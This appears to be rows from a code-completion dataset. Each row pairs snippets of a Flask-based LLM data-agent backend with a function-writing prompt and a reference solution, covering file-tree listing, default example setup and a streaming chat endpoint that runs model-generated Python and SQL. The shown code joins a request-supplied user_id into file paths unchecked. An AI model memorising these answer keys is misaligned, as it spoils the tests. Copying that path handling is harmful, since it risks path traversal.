from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
UNFOUND = 404
INTERNAL = 500
DEFAULT_USER_ID = "DefaultUser"
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
The provided code snippet includes necessary dependencies for implementing the `get_path_tree` function. Write a Python function `def get_path_tree() -> Response` to solve the following problem:
Gets the file path tree of the user's folder.
Here is the function:
def get_path_tree() -> Response:
"""Gets a file path tree of one file."""
try:
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
if user_id == "": # front-end may enter empty user_id
return jsonify([])
root_path = create_personal_folder(user_id)
highlighted_files = request_json.get("highlighted_files", [])
if root_path is None:
return {"error": "root_path parameter is required", "error_code": 404}
if os.path.exists(root_path) and os.path.isdir(root_path):
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0,
highlighted_files=highlighted_files)
return jsonify(current_path_tree_list)
else:
return Response(response=None, status=f"{UNFOUND} Directory not found")
except Exception as e:
        return Response(response=None, status=f"{INTERNAL} Directory not found") | Gets the file path tree of the user's folder. |
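A sketch of the response shape, assuming a user folder that contains one sub-folder with a single csv inside; ids follow the depth-first order assigned by _path_tree_for_react_dnd_treeview and "parent" references those ids, with 0 standing for the root folder:
# Hypothetical layout:  <root>/data/  and  <root>/data/demo.csv
# Expected jsonify()-ed tree ("highlight" depends on "highlighted_files"):
[
    {"id": 1, "parent": 0, "droppable": True,  "text": "data",     "highlight": False},
    {"id": 2, "parent": 1, "droppable": False, "text": "demo.csv", "highlight": False},
]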
188,442 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
app = Flask(__name__)
app.config["UPLOAD_FOLDER"] = os.path.dirname(current_path) + "/data"
app.config["CODE_EXECUTION_MODE"] = os.getenv("CODE_EXECUTION_MODE", "local")
UNFOUND = 404
INTERNAL = 500
DEFAULT_USER_ID = "DefaultUser"
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
The provided code snippet includes necessary dependencies for implementing the `set_default_examples` function. Write a Python function `def set_default_examples() -> Response` to solve the following problem:
Sets default files for each user.
Here is the function:
def set_default_examples() -> Response:
"""Sets default files for each user."""
try:
# Should be called after auth is verified
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
root_path = create_personal_folder(user_id)
example_dir = os.path.dirname(os.path.dirname(app.config["UPLOAD_FOLDER"]))
example_path = os.path.join(example_dir, "data/examples/")
if os.path.exists(example_path):
shutil.copytree(example_path, root_path, dirs_exist_ok=True)
return jsonify(
{"success": True, "message": "Default examples are set successfully"})
else:
return Response(response=None,
status=f"{UNFOUND} Directory not found at {example_dir}")
except Exception as e:
return Response(response=None,
status=f"{INTERNAL} Fail to Set Default Examples") | Sets default files for each user. |
188,443 | import traceback
from typing import Dict, List, Union
from flask import Response, request, stream_with_context, Response
from backend.api.file import _get_file_path_from_node
from backend.api.language_model import get_llm
from backend.app import app
from backend.main import (
grounding_source_pool,
jupyter_kernel_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.charts import polish_echarts
from backend.utils.streaming import (
single_round_chat_with_executor,
single_round_chat_with_agent_streaming,
)
from backend.utils.utils import get_data_summary_cls
from backend.schemas import OVERLOAD, UNAUTH, NEED_CONTINUE_MODEL
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks import AgentStreamingStdOutCallbackHandler
from real_agents.adapters.data_model import DatabaseDataModel, DataModel, JsonDataModel, \
TableDataModel
from real_agents.adapters.executors import ChatExecutor
from real_agents.adapters.interactive_executor import initialize_agent
from real_agents.data_agent import CodeGenerationExecutor, KaggleDataLoadingExecutor
from real_agents.adapters.memory import ConversationReActBufferMemory, \
ReadOnlySharedStringMemory
def create_interaction_executor(
grounding_source_dict: Dict[str, DataModel],
code_interpreter_languages: List[str],
code_interpreter_tools: List[str],
llm: BaseLanguageModel,
llm_name: str,
user_id: str = None,
chat_id: str = None,
code_execution_mode: str = "local",
) -> AgentExecutor:
"""Creates an agent executor for interaction.
Args:
grounding_source_dict: A dict of grounding source filepath and data.
code_interpreter_languages: A string to indicate the programming language to use.
code_interpreter_tools: A list of augmented data tools.
llm: A llm model.
llm_name: A string llm name.
user_id: A string of user id.
chat_id: A string chat id.
code_execution_mode: A string indicating where code is executed.
Returns:
An agent executor.
"""
# Initialize Memory
memory = ConversationReActBufferMemory(
memory_key="chat_history", return_messages=True, llm=llm, max_token_limit=3500
)
read_only_memory = ReadOnlySharedStringMemory(memory=memory)
# Initialize tools(executors)
basic_chat_executor = ChatExecutor()
python_code_generation_executor = CodeGenerationExecutor(
programming_language="python", memory=read_only_memory)
sql_code_generation_executor = CodeGenerationExecutor(programming_language="sql",
memory=read_only_memory)
echart_code_generation_executor = CodeGenerationExecutor(
programming_language="python", memory=read_only_memory, usage="echarts"
)
kaggle_data_loading_executor = KaggleDataLoadingExecutor()
def run_python_code_builder(term: str) -> Union[Dict, DataModel]:
try:
# Only TableDataModel are allowed as input to python
# input_grounding_source = [gs for _, gs in grounding_source_dict.items()
# if isinstance(gs, TableDataModel)]
input_grounding_source = [gs for gs in grounding_source_dict.values()]
# Get the result
results = python_code_generation_executor.run(
user_intent=term,
llm=llm,
grounding_source=input_grounding_source,
user_id=user_id,
chat_id=chat_id,
code_execution_mode=code_execution_mode,
jupyter_kernel_pool=jupyter_kernel_pool,
)
logger.bind(msg_head=f"PythonCodeBuilder results({llm})").debug(results)
if results["result"]["success"]:
if results["result"]["result"] is not None:
raw_output = results["result"]["result"]
elif results["result"]["stdout"] != "":
raw_output = results["result"]["stdout"]
else:
raw_output = ""
observation = JsonDataModel.from_raw_data(
{
"success": True,
"result": raw_output,
"images": results["result"]["outputs"] if ".show()" in results[
"intermediate_steps"] else [],
"intermediate_steps": results["intermediate_steps"],
},
filter_keys=["images"],
)
else:
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": results["result"]["error_message"],
"intermediate_steps": results["intermediate_steps"],
}
)
return observation
except Exception as e:
logger.bind(msg_head=f"PythonCodeBuilder error({llm})").error(str(e))
traceback.print_exc()
results = basic_chat_executor.run(user_intent=term, llm=llm)
return results["result"]
def run_sql_code_builder(term: str) -> Union[Dict, DataModel]:
try:
def convert_grounding_source_as_db(
grounding_source_dict: Dict[str, DataModel]
) -> Union[List[TableDataModel], DatabaseDataModel]:
db_grounding_source = [
gs for _, gs in grounding_source_dict.items() if
isinstance(gs, DatabaseDataModel)
]
table_grounding_source = [
gs for _, gs in grounding_source_dict.items() if
isinstance(gs, TableDataModel)
]
assert len(db_grounding_source) <= 1
if len(table_grounding_source) == 0:
# Only DatabaseDataModel. Assume there is at least one grounding
# source
return db_grounding_source[0]
else:
for t_gs in table_grounding_source:
if len(db_grounding_source) == 0:
# No DatabaseDataModel, then convert the first TableModel
# into DatabaseDataModel.
if t_gs.db_view is None:
t_gs.set_db_view(
DatabaseDataModel.from_table_data_model(t_gs))
db_gs = t_gs.db_view
db_grounding_source.append(db_gs)
else:
# Insert TableDataModel into the existing DatabaseDataModel
db_gs = db_grounding_source[0]
db_gs.insert_table_data_model(t_gs)
return db_gs
input_grounding_source = convert_grounding_source_as_db(
grounding_source_dict)
results = sql_code_generation_executor.run(
user_intent=term,
grounding_source=input_grounding_source,
llm=llm,
)
logger.bind(msg_head=f"SQLQueryBuilder results({llm})").debug(results)
if results["result"]["success"]:
observation = JsonDataModel.from_raw_data({
"success": True,
"result": results["result"]["result"],
"intermediate_steps": results["intermediate_steps"],
})
else:
observation = JsonDataModel.from_raw_data({
"success": False,
"result": results["result"]["error_message"],
"intermediate_steps": results["intermediate_steps"],
})
return observation
except Exception as e:
logger.bind(msg_head=f"SQLQueryBuilder results({llm})").error(str(e))
traceback.print_exc()
results = basic_chat_executor.run(user_intent=term, llm=llm)
return results["result"]
def run_echarts_interactive_plotter(term: str) -> Union[Dict, DataModel]:
try:
input_grounding_source = [gs for _, gs in grounding_source_dict.items() if
isinstance(gs, TableDataModel)]
results = echart_code_generation_executor.run(
user_intent=term,
llm=llm,
grounding_source=input_grounding_source,
user_id=user_id,
chat_id=chat_id,
code_execution_mode=code_execution_mode,
jupyter_kernel_pool=jupyter_kernel_pool,
)
logger.bind(msg_head=f"PlotInteractivePlotter results({llm})").debug(
results)
if results["result"]["success"]:
results = JsonDataModel.from_raw_data(
{
"success": True,
"result": "",
"echarts": polish_echarts(results["result"]["stdout"]),
"intermediate_steps": results["intermediate_steps"],
},
filter_keys=["result", "echarts"],
)
else:
results = JsonDataModel.from_raw_data(
{
"success": False,
"result": results["result"]["error_message"],
"intermediate_steps": results["intermediate_steps"],
}
)
return results
except Exception as e:
logger.bind(msg_head=f"PlotInteractivePlotter error({llm})").error(str(e))
results = basic_chat_executor.run(user_intent=term, llm=llm)
return results["result"]
def run_kaggle_data_loader(term: str) -> Union[Dict, DataModel]:
try:
results = kaggle_data_loading_executor.run(
user_intent=term,
llm=llm,
)
logger.bind(msg_head=f"KaggleDataLoader results({llm})").debug(results)
results = JsonDataModel.from_raw_data(
{
"success": True,
"kaggle_action": results["kaggle_action"],
"kaggle_output_info": results["kaggle_output_info"],
},
)
return results
except Exception as e:
logger.bind(msg_head=f"KaggleDataLoader results({llm})").error(str(e))
traceback.print_exc()
results = basic_chat_executor.run(user_intent=term, llm=llm)
return results["result"]
tool_dict = {
"PythonCodeBuilder": Tool(
name="PythonCodeBuilder",
func=run_python_code_builder,
description="""
Description: This tool adeptly turns your textual problem or query into Python code & execute it to get results. It shines when dealing with mathematics, data manipulation tasks, general computational problems and basic visualization like matplotlib. Please note it does not generate database queries.
Input: A natural language problem or question.
Output: A Python program + its execution result to solve the presented problem or answer the question.
Note: The tool MUST be used whenever you want to generate & execute Python code.
""",
),
"SQLQueryBuilder": Tool(
name="SQLQueryBuilder",
func=run_sql_code_builder,
description="""
Description: Specialized for database tasks, this tool converts your natural language query into SQL code & execute it to get results. It's particularly suited for creating database queries, but it doesn't solve mathematical problems or perform data manipulations outside the SQL context. Be sure to specify the table name for successful operation.
Input: A natural language query related to database operations, along with the name of the table on which the query will operate.
Output: A SQL program, ready to execute on the specified database table, and its execution result.
Note: It is ALWAYS preferable to use the tool whenever you want to generate SQL query & execute the SQL query.
""",
),
"Echarts": Tool(
name="Echarts",
func=run_echarts_interactive_plotter,
description="""
Description: Dive into the world of data visualization with this specialized Echarts tool. It takes your data table and creates Echarts code & show Echarts for four distinct chart types: scatter, bar, line, and pie, selecting the most appropriate labels and titles.
Input: A natural language query detailing your desired visualization, no other words.
Output: An Echarts script, specifically tailored for your data, that generates an interactive chart upon execution.
Note: Currently, this tool supports only the listed chart types. Please ensure your desired visualization aligns with these options to experience the full capabilities of this dynamic Echarts tool.""",
),
"KaggleDataLoader": Tool(
name="KaggleDataLoader",
func=run_kaggle_data_loader,
description="""
Description: The KaggleDataLoader tool allows you to seamlessly connect to Kaggle datasets. It allows you to load specific datasets by providing the exact dataset path, or it can aid in the search and retrieval of datasets based on the information given in your user input, providing you with a vast array of data sources for your projects.
Input: A natural language intent that may mention path of the Kaggle dataset, or some keyword or other relevant information about the dataset you are interested in.
Output: The action you want to perform, and the extracted path or searched relevant datasets depending on your input.
""",
),
}
# Data profiling is not activated in agent
IGNORE_TOOLS = ["DataProfiling"]
# Activate tools according to the user selection
tools = [tool_dict[lang["name"]] for lang in code_interpreter_languages]
for tool in code_interpreter_tools:
if tool["name"] not in IGNORE_TOOLS:
tools.append(tool_dict[tool["name"]])
# Build the chat agent with LLM and tools
continue_model = llm_name if llm_name in NEED_CONTINUE_MODEL else None
interaction_executor = initialize_agent(tools, llm, continue_model, memory=memory,
verbose=True)
return interaction_executor
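# --- Hedged usage sketch (not part of the original snippet) -----------------
# Assumes a single csv grounding source and only the Python tool enabled; the
# file path, llm name, and selection lists below are hypothetical placeholders.
# grounding_source_dict = {
#     "/path/to/demo.csv": TableDataModel.from_raw_data(
#         raw_data=pd.read_csv("/path/to/demo.csv"),
#         raw_data_name="demo",
#         raw_data_path="/path/to/demo.csv",
#     )
# }
# llm = get_llm("gpt-3.5-turbo-16k")
# interaction_executor = create_interaction_executor(
#     grounding_source_dict=grounding_source_dict,
#     code_interpreter_languages=[{"name": "PythonCodeBuilder"}],
#     code_interpreter_tools=[],
#     llm=llm,
#     llm_name="gpt-3.5-turbo-16k",
#     user_id="DefaultUser",
#     chat_id="chat-001",
#     code_execution_mode="local",
# )
# The executor is then driven by single_round_chat_with_agent_streaming below.
# ----------------------------------------------------------------------------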
def _get_file_path_from_node(folder: str, file_node: dict) -> Any:
path_tree_list: list = []
id_to_path_dict = {0: folder}
_path_tree_for_react_dnd_treeview(path_tree_list, id_to_path_dict, folder, 0)
path = id_to_path_dict[file_node["id"]]
return path
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
app = Flask(__name__)
app.config["UPLOAD_FOLDER"] = os.path.dirname(current_path) + "/data"
app.config["CODE_EXECUTION_MODE"] = os.getenv("CODE_EXECUTION_MODE", "local")
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
grounding_source_pool: ChatMemoryManager = ChatMemoryManager()
message_id_register = VariableRegister(name="message_id_register", backend=VARIABLE_REGISTER_BACKEND)
UNAUTH = 401
OVERLOAD = 503
DEFAULT_USER_ID = "DefaultUser"
def get_data_summary_cls(file_path: str) -> DataSummaryExecutor:
suffix = Path(file_path).suffix
if suffix == ".csv":
data_summary_cls = TableSummaryExecutor
elif suffix == ".tsv" or suffix == ".txt":
raise NotImplementedError("Not implemented yet")
elif suffix == ".xlsx" or suffix == ".xls":
data_summary_cls = TableSummaryExecutor
elif suffix == ".sqlite" or suffix == ".db":
data_summary_cls = TableSummaryExecutor
elif suffix == ".jpeg" or suffix == ".png" or suffix == ".jpg":
data_summary_cls = ImageSummaryExecutor
else:
raise ValueError("File type not allowed to be set as grounding source")
return data_summary_cls
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
def single_round_chat_with_agent_streaming(
stream_handler: AgentStreamingStdOutCallbackHandler,
interaction_executor: AgentExecutor,
user_intent: str,
human_message_id: int,
ai_message_id: int,
user_id: str,
chat_id: str,
message_list: List[Dict[str, Any]],
parent_message_id: int,
llm_name: str,
app_type: str = "plugins",
) -> Any:
"""Streams the response of the agent to the frontend."""
assert app_type in APP_TYPES, f"app_type should be one of {APP_TYPES}"
with multiprocess.Manager() as share_manager:
err_pool: Dict[str, Any] = share_manager.dict()
memory_pool: Dict[str, Any] = share_manager.dict()
share_list = share_manager.list()
memory_pool[chat_id] = []
stream_handler.for_display = share_list
chat_thread = multiprocess.Process(
target=_wrap_agent_caller,
args=(
interaction_executor,
{
"input": user_intent,
},
chat_id,
err_pool,
memory_pool,
[stream_handler],
),
)
threading_pool.register_thread(chat_id, chat_thread)
chat_thread.start()
empty_s_time: float = -1
last_heartbeat_time: float = -1
timeout = TIME_OUT_MAP[app_type]
LEFT_SIGN = "("
RIGHT_SIGN = ")"
start_buffer = False
streamed_transition_text_buffer = ""
streamed_links = []
converted_card_info_list = []
yield pack_json(
{
"human_message_id": human_message_id,
"ai_message_id": ai_message_id,
}
)
# Display streaming to frontend
display_stream = DisplayStream(execution_result_max_tokens=EXECUTION_RESULT_MAX_TOKENS_MAP[app_type])
is_block_first, current_block_type = False, None
intermediate_list, final_list = [], [] # Only for database storage
try:
while chat_thread.is_alive() or len(stream_handler.for_display) > 0:
# print(memory_pool, err_pool, "out")
if stream_handler.is_end:
# The ending of the streaming is marked by the is_end variable from AgentStreamingStdOutCallbackHandler in agent_streaming.py
break
if len(stream_handler.for_display) == 0:
# first time display list is empty
if empty_s_time == -1:
empty_s_time = time.time()
# already empty for some time
else:
if time.time() - empty_s_time > timeout and chat_thread.is_alive():
threading_pool.timeout_thread(chat_id)
break
if last_heartbeat_time == -1:
last_heartbeat_time = time.time()
else:
if time.time() - last_heartbeat_time > HEARTBEAT_INTERVAL and chat_thread.is_alive():
last_heartbeat_time = -1
yield _streaming_token(
{"text": "🫀", "type": "heartbeat", "final": False}, False, user_id, chat_id, False
)
else:
empty_s_time = -1
last_heartbeat_time = -1
while len(stream_handler.for_display) > 0:
token = stream_handler.for_display.pop(0)
items_to_display = display_stream.display(token)
# Skip the "identifier" and "key" token
if items_to_display is None:
continue
for item in items_to_display:
# Check if the block type is changed
if item["type"] != current_block_type:
current_block_type = item["type"]
is_block_first = True
else:
is_block_first = False
is_final = item.get("final", False)
# Render the item(s)
if item["type"] in STREAM_BLOCK_TYPES:
# Render image and echarts as block
yield _streaming_block(item, is_final, user_id, chat_id)
elif item["type"] in STREAM_TOKEN_TYPES:
# Render the rest as plain text
item["text"] = _render_preprocess(item["text"])
yield _streaming_token(item, is_final, user_id, chat_id, is_block_first)
# Save the intermediate steps and final answer
if is_final:
final_list.append(item)
else:
intermediate_list.append(item)
if item["type"] == "transition" and item["text"] == RIGHT_SIGN:
start_buffer = False
link = streamed_transition_text_buffer
streamed_transition_text_buffer = ""
card_info_list = extract_card_info_from_text(link)
# empty the buffer after extracting card info
streamed_transition_text_buffer = ""
if len(card_info_list) > 0:
streaming_card_info_list: list[dict[str, Any]] = [
{
"final_answer": {
"text": json.dumps(card_info),
"type": "card_info",
},
"is_block_first": False,
"streaming_method": "card_info",
"user_id": user_id,
"chat_id": chat_id,
}
for card_info in card_info_list
]
streamed_links.extend([card_info["web_link"] for card_info in card_info_list])
converted_card_info_list.extend(
[
{
"text": stream_card_info["final_answer"]["text"],
"type": stream_card_info["final_answer"]["type"],
}
for stream_card_info in streaming_card_info_list
]
)
for streaming_card_info in streaming_card_info_list:
yield pack_json(streaming_card_info)
if start_buffer == True:
streamed_transition_text_buffer += item["text"]
if item["type"] == "transition" and item["text"] == LEFT_SIGN:
start_buffer = True
except Exception as e:
import traceback
traceback.print_exc()
# Wait for the chat thread to finish
chat_thread.join()
stop_flag, timeout_flag, error_msg = threading_pool.flush_thread(chat_id)
error_msg = err_pool.pop(chat_id, None)
# Response Error!!
if stop_flag:
yield pack_json({"success": False, "error": "stop"})
return
elif timeout_flag:
yield pack_json({"success": False, "error": "timeout"})
return
elif error_msg is not None:
error_msg_to_render = error_rendering(error_msg)
yield pack_json({"success": False, "error": "internal", "error_msg": error_msg_to_render})
return
elif len(memory_pool[chat_id]) == 0:
yield pack_json({"success": False, "error": "internal"})
return
# Response Success!!
message_list_from_memory = memory_pool[chat_id]
del stream_handler
# share_manager.shutdown()
del memory_pool, err_pool, share_list, share_manager, interaction_executor
# Save conversation to memory
new_human_message = message_list_from_memory[-2]
new_ai_message = message_list_from_memory[-1]
new_human_message.update({"message_id": human_message_id, "parent_message_id": parent_message_id})
new_ai_message.update({"message_id": ai_message_id, "parent_message_id": human_message_id})
message_list.extend([new_human_message, new_ai_message])
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New human message").debug(new_human_message)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New ai message").debug(new_ai_message)
MessageMemoryManager.set_pool_info_with_id(message_pool, user_id, chat_id, message_list)
# Save conversation to database
db = get_user_conversation_storage()
# Combine the streaming tokens/blocks
intermediate_list_combined = _combine_streaming(intermediate_list)
final_list_combined = _combine_streaming(final_list)
if len(converted_card_info_list) > 0:
final_list_combined.extend(converted_card_info_list)
# Insert User Message, if regenerate there is no need to insert again
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "user",
"data_for_human": user_intent,
"data_for_llm": message_list[-2]["message_content"],
"raw_data": None,
}
)
# Insert AI Message
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": ai_message_id,
"parent_message_id": human_message_id,
"version_id": 0,
"role": "assistant",
"data_for_human": {
"intermediate_steps": intermediate_list_combined,
"final_answer": final_list_combined,
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
)
def single_round_chat_with_executor(
executor: Any,
user_intent: Any,
human_message_id: int,
ai_message_id: int,
user_id: str,
chat_id: str,
message_list: List[Dict[str, Any]],
parent_message_id: int,
llm: BaseLanguageModel,
app_type: str = "copilot",
) -> Any:
"""Streams the response of the executor to the frontend."""
stream_handler = executor.stream_handler
share_manager = multiprocess.Manager()
err_pool: Dict[str, Any] = share_manager.dict()
memory_pool: Dict[str, Any] = share_manager.dict()
share_list = share_manager.list()
stream_handler._all = share_list
memory_pool[chat_id] = []
chat_thread = multiprocess.Process(
target=_wrap_executor_caller,
args=(
executor,
user_intent,
llm,
chat_id,
err_pool,
memory_pool,
),
)
threading_pool.register_thread(chat_id, chat_thread)
empty_s_time: float = -1
timeout = TIME_OUT_MAP[app_type]
chat_thread.start()
yield pack_json(
{
"human_message_id": human_message_id,
"ai_message_id": ai_message_id,
}
)
# FIXME: treat data summary as a special tool
STREAM_TOOL_TYPE = "tool"
data_summary_tool_item = {
"text": executor.tool_name,
"type": STREAM_TOOL_TYPE,
}
yield _streaming_block(data_summary_tool_item, is_final=False, user_id=user_id, chat_id=chat_id)
is_block_first = True
final_answer = []
while chat_thread.is_alive() or len(stream_handler._all) > 0:
if stream_handler.is_end:
break
if len(stream_handler._all) == 0:
# first time display list is empty
if empty_s_time == -1:
empty_s_time = time.time()
# already empty for some time
else:
if time.time() - empty_s_time > timeout and chat_thread.is_alive():
threading_pool.timeout_thread(chat_id)
break
else:
empty_s_time = -1
while len(stream_handler._all) > 0:
text = stream_handler._all.pop(0)
final_answer.append(text)
if is_block_first:
is_block_first_ = True
is_block_first = False
else:
is_block_first_ = False
yield pack_json(
{
"final_answer": {
"type": "text",
"text": text + " ",
},
"is_block_first": is_block_first_,
"streaming_method": "char",
"user_id": user_id,
"chat_id": chat_id,
}
)
time.sleep(0.035)
chat_thread.join()
stop_flag, timeout_flag, error_msg = threading_pool.flush_thread(chat_id)
error_msg = err_pool.pop(chat_id, None)
if stop_flag:
yield pack_json({"success": False, "error": "stop"})
return
elif timeout_flag:
yield pack_json({"success": False, "error": "timeout"})
return
elif error_msg is not None:
error_msg_to_render = error_rendering(error_msg)
yield pack_json({"success": False, "error": "internal", "error_msg": error_msg_to_render})
return
elif len(memory_pool[chat_id]) == 0 or len(final_answer) == 0:
yield pack_json({"success": False, "error": "internal"})
return
# Response Success!!
del share_list, stream_handler
del memory_pool, err_pool, share_manager, executor
# Save conversation to memory
final_answer_str = " ".join(final_answer)
message_list.append(
{
"message_id": ai_message_id,
"parent_message_id": parent_message_id,
"message_type": "ai_message",
"message_content": final_answer_str,
}
)
logger.bind(user_id=user_id, chat_id=chat_id, api="chat/", msg_head="New data summary message").debug(
message_list[-1]
)
MessageMemoryManager.set_pool_info_with_id(message_pool, user_id, chat_id, message_list)
# Database Operations
db = get_user_conversation_storage()
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": ai_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "assistant",
"data_for_human": {
"intermediate_steps": [
data_summary_tool_item,
],
"final_answer": [
{
"text": final_answer,
"type": "plain",
}
],
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
)
The provided code snippet includes necessary dependencies for implementing the `chat` function. Write a Python function `def chat() -> Response | Dict` to solve the following problem:
Returns the chat response of data agent.
Here is the function:
def chat() -> Response | Dict:
"""Returns the chat response of data agent."""
try:
# Get request parameters
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
user_intent = request_json["user_intent"]
parent_message_id = int(request_json["parent_message_id"])
code_interpreter_languages = request_json.get("code_interpreter_languages", [])
code_interpreter_tools = request_json.get("code_interpreter_tools", [])
api_call = request_json.get("api_call", None)
llm_name = request_json["llm_name"]
temperature = request_json.get("temperature", 0.7)
stop_words = ["[RESPONSE_BEGIN]", "TOOL RESPONSE"]
kwargs = {
"temperature": temperature,
"stop": stop_words,
}
# Get language model
stream_handler = AgentStreamingStdOutCallbackHandler()
llm = get_llm(llm_name, **kwargs)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat",
msg_head="Request json").debug(request_json)
if api_call:
# Load/init grounding source
grounding_source_dict = grounding_source_pool.get_pool_info_with_id(user_id,
chat_id,
default_value={})
# Find the mainstay message list from leaf to root
activated_message_list = message_pool.get_activated_message_list(
user_id, chat_id, default_value=list(),
parent_message_id=parent_message_id
)
assert api_call["api_name"] == "DataProfiling"
ai_message_id = message_id_register.add_variable("")
file_node = api_call["args"]["activated_file"]
folder = create_personal_folder(user_id)
file_path = _get_file_path_from_node(folder, file_node)
executor = get_data_summary_cls(file_path)()
gs = grounding_source_dict[file_path]
return stream_with_context(
Response(
single_round_chat_with_executor(
executor,
user_intent=gs,
human_message_id=None,
ai_message_id=ai_message_id,
user_id=DEFAULT_USER_ID,
chat_id=api_call["args"]["chat_id"],
message_list=activated_message_list,
parent_message_id=api_call["args"]["parent_message_id"],
llm=llm,
app_type="copilot",
),
content_type="application/json",
)
)
else:
# Load/init grounding source
grounding_source_dict = grounding_source_pool.get_pool_info_with_id(user_id,
chat_id,
default_value={})
# Build executor and run chat
interaction_executor = create_interaction_executor(
grounding_source_dict=grounding_source_dict,
code_interpreter_languages=code_interpreter_languages,
code_interpreter_tools=code_interpreter_tools,
llm=llm,
llm_name=llm_name,
user_id=user_id,
chat_id=chat_id,
code_execution_mode=app.config["CODE_EXECUTION_MODE"],
)
# Find the mainstay message list from leaf to root
activated_message_list = message_pool.get_activated_message_list(
user_id, chat_id, default_value=list(),
parent_message_id=parent_message_id
)
message_pool.load_agent_memory_from_list(interaction_executor.memory,
activated_message_list)
human_message_id = message_id_register.add_variable(user_intent)
ai_message_id = message_id_register.add_variable("")
return stream_with_context(
Response(
single_round_chat_with_agent_streaming(
interaction_executor=interaction_executor,
user_intent=user_intent,
human_message_id=human_message_id,
ai_message_id=ai_message_id,
user_id=user_id,
chat_id=chat_id,
message_list=activated_message_list,
parent_message_id=parent_message_id,
llm_name=llm_name,
stream_handler=stream_handler,
app_type="copilot"
),
content_type="application/json",
)
)
except Exception as e:
try:
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat",
msg_head="Chat error").error(str(e))
import traceback
traceback.print_exc()
except:
# if user_id & chat_id not found, unauth err
return Response(response=None, status=f"{UNAUTH} Invalid Authentication")
return Response(response=None,
status=f"{OVERLOAD} Server is currently overloaded") | Returns the chat response of data agent. |
188,444 | from time import sleep
import copy
